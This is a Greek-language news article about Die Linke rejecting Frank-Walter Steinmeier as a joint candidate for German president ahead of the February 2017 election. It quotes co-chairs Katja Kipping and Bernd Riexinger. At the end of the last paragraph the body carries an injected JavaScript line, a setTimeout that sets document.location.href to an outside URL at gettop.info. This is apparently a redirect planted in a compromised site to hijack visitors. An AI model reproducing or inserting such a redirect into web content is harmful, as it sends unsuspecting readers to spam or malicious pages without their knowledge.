Η Die Linke απέρριψε τον Σταϊνμάγερ ως υποψήφιο Πρόεδρο Δημοκρατίας

0
3

 

Η Die Linke σκοπεύει να υποβάλει δική του υποψηφιότητα για Πρόεδρο της Δημοκρατίας, εάν δεν βρεθεί κονός υποψήφιος με το Σοσιαλδημοκρατικό Κόμμα (SPD) και τους Πράσινους (Die Gruenen).

H Κάτια Κίπινκ, συμπρόεδρος του κόμματος της γερμανικής Αριστεράς (Die Linke), απέρριψε τον σοσιαλδημοκράτη υπουργό Εξωτερικών Φρανκ-Βάλτερ Στάινμάιερ ως κοινό υποψήφιο πρόεδρο της Δημοκρατίας σε συνεντευξή της στην εφημερίδα Berliner Zeitung.

Οι εκλογές για ανάδειξη Προέδρου από την ομπονδιακή Βουλή στη Γερμανία είναι στις 14 Φεβουάριο του 2017.

Προανήγγειλε δε ιδίαν υποψηφιότητα του κόμματός της, «όχι μόνο διότι είναι ο αρχιτέκτονας της Ατζέντας 2010, αλλά και διότι είναι άμεσα συνδεδεμένος με τον κυβερνώντα συνασπισμό Χριστιανοδημοκρατών – Σοσιαλδημοκρατών και με όλες τις συμμετοχές της Γερμανίας σε στρατιωτικές επιχειρήσεις», όπως είπε. Πρόσθεσε δε ότι «ακόμα και αν κάποιος τα αφήσει αυτά κατά μέρος, δεν μπορεί να δοθεί έτσι ένα μήνυμα κοινωνικής και δημοκρατικής αλλαγής, δηλαδή με το να κάνει μια δημόσια ανακοίνωση ένα κόμμα (SPD) και οι άλλοι να ακολουθούν. Μια αλλαγή για έναν κεντροαριστερό συνασπισμό είναι απλώς διαφορετική«, τόνισε η Κάτια Κίπινκ.

«Εάν υπάρχει ακόμα η βούληση από πλευράς του Σοσιαλδημοκρατικού Κόμματος (SPD) και των Πρασίνων (Die Gruenen) για μια κοινή υποψηφιότητα είμαστε ανοικτοί. Εάν όχι, τότε είμαστε καλά προετοιμασμένοι γι αυτό και θα προτείνουμε δική μας υποψηφιότητα, η οποία να στέλνει ένα σαφές μύνημα κατά του κοινωνικού διχασμού σε αυτή τη χώρα», είπε η ίδια.

Ας σημειωθεί, ότι ο συμπρόεδρος του κόμματος της Αριστεράς Μπέρντ Ρίξινγκερ έχει ήδη χαρακτηρίει τον Στάινμάιερ «μη εκλέξιμο».

Το SPD έχει ήδη προετείνει τον Φρανκ-Βάλτερ Σταινμάγερ, αλλά δεν είναι επιθυμητός ούτε από τους χριστιανοδημοκράτες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here